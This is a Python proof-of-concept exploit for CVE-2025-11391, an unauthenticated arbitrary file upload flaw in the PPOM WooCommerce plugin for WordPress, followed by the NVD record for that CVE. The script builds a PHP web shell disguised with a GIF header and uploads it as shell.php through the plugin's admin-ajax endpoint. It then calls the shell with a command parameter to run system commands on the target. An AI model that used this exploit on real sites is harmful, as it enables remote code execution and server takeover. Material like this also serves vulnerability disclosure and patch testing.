CVE-2025-11391

# CVE-2025-11391 PoC - PPOM Plugin Arbitrary File Upload # This PoC demonstrates the arbitrary file upload vulnerability in PPOM plugin's image cropper functionality import requests TARGET_URL = "http://target-wordpress-site.com" SHELL_CONTENT = b"GIF89a;\n<?php system($_GET['cmd']); ?>" # Step 1: Create a malicious file disguised as a GIF image # The GIF89a header helps bypass basic file type checks malicious_file = ( b"GIF89a\x01\x00\x01\x00\x00\x00\x00;\n" # GIF header b"<?php echo 'VULNERABLE'; system($_GET['cmd']); ?>" ) # Step 2: Upload the malicious file via PPOM image cropper endpoint # The endpoint is typically accessible without authentication upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" payload = { "action": "ppom_upload_image", "ppom_product_id": "1", } files = { "ppom_file": ("shell.php", malicious_file, "image/gif") } # Step 3: Send the upload request response = requests.post(upload_url, data=payload, files=files) print(f"Upload response: {response.status_code}") print(f"Response body: {response.text}") # Step 4: Access the uploaded shell to execute commands # The file is typically saved in /wp-content/uploads/ppom/ shell_url = f"{TARGET_URL}/wp-content/uploads/ppom/shell.php?cmd=id" response = requests.get(shell_url) print(f"Shell execution result: {response.text}")

{"cve": {"id": "CVE-2025-11391", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PPOM – Product Addons & Custom Fields for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image cropper functionality in all versions up to, and including, 33.0.15. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the vulnerable code is in the free version, this only affected users with the paid version of the software installed and activated."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-product-addon/trunk/inc/hooks.php#L45", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379431%40woocommerce-product-addon&new=3379431%40woocommerce-product-addon&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf851bed-f5d8-44e2-810d-906ba3d3c1c5?source=cve", "source": "[email protected]"}]}}